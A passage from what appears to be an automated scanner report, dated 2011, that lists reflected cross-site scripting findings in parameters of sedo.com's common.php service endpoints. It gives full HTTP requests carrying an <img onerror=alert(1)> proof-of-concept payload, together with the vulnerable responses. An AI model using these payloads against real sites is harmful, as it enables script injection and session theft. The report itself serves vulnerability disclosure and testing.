Content-Length: 33799
Content-Type: application/xml;charset=UTF-8
X-Cache: MISS from 518440
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<rss version="2.0">
<channel>
<title>Sedo - Featured Listings US market</title>
<description><![CDATA[
...[SNIP]...
<link>http://www.sedo.com/search/details.php4?domain=ecolets.com&amp;tracked=&amp;partnerid=6765b<a>552c8089353&amp;language=us</link>
...[SNIP]...

2.15. http://www.sedo.com/search/service/common.php [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681 was submitted in the f parameter. This input was echoed as 13371<img src=a onerror=alert(1)>6da321cd681 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=json&m=commonData&f=tldListCommonAdditional13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:23:11 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"tldListCommonAdditional13371<img src=a onerror=alert(1)>6da321cd681\" to access","ee":"ParameterException"}}}

2.16. http://www.sedo.com/search/service/common.php [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload e2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f was submitted in the m parameter. This input was echoed as e2767<img src=a onerror=alert(1)>8319f53054f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=json&m=commonDatae2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f&f=tldListCommonAdditional&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:59 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 518440
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonDatae2767<img src=a onerror=alert(1)>8319f53054f\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}

2.17. http://www.sedo.com/search/service/common.php [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the o request parameter is copied into the HTML document as plain text between tags. The payload f37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3 was submitted in the o parameter. This input was echoed as f37f7<img src=a onerror=alert(1)>5a916765f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=jsonf37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3&m=commonData&f=tldListCommonAdditional&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:47 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 838164
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"jsonf37f7<img src=a onerror=alert(1)>5a916765f3\"","ee":"ServiceParameterException","p":["o"]}}}

2.18. http://www.sedo.com/service/common.php [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1 was submitted in the f parameter. This input was echoed as 9c120<img src=a onerror=alert(1)>0ebd76842c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json&m=commonData&f=isEverLoggedInCustomer9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:58 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 197
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 468307
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"isEverLoggedInCustomer9c120<img src=a onerror=alert(1)>0ebd76842c1\" to access","ee":"ParameterException"}}}

2.19. http://www.sedo.com/service/common.php [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07 was submitted in the m parameter. This input was echoed as 6f144<img src=a onerror=alert(1)>8c14f811c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json&m=commonData6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07&f=isEverLoggedInCustomer&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:49 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 865011
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonData6f144<img src=a onerror=alert(1)>8c14f811c07\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}

2.20. http://www.sedo.com/service/common.php [o parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the o request parameter is copied into the HTML document as plain text between tags. The payload 367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c was submitted in the o parameter. This input was echoed as 367fc<img src=a onerror=alert(1)>7f7f876415c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c&m=commonData&f=isEverLoggedInCustomer&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:41 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 199
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"json367fc<img src=a onerror=alert(1)>7f7f876415c\"","ee":"ServiceParameterException","p":["o"]}}}

Report generated by XSS.CX at Sun Oct 16 06:44:45 CDT 2011.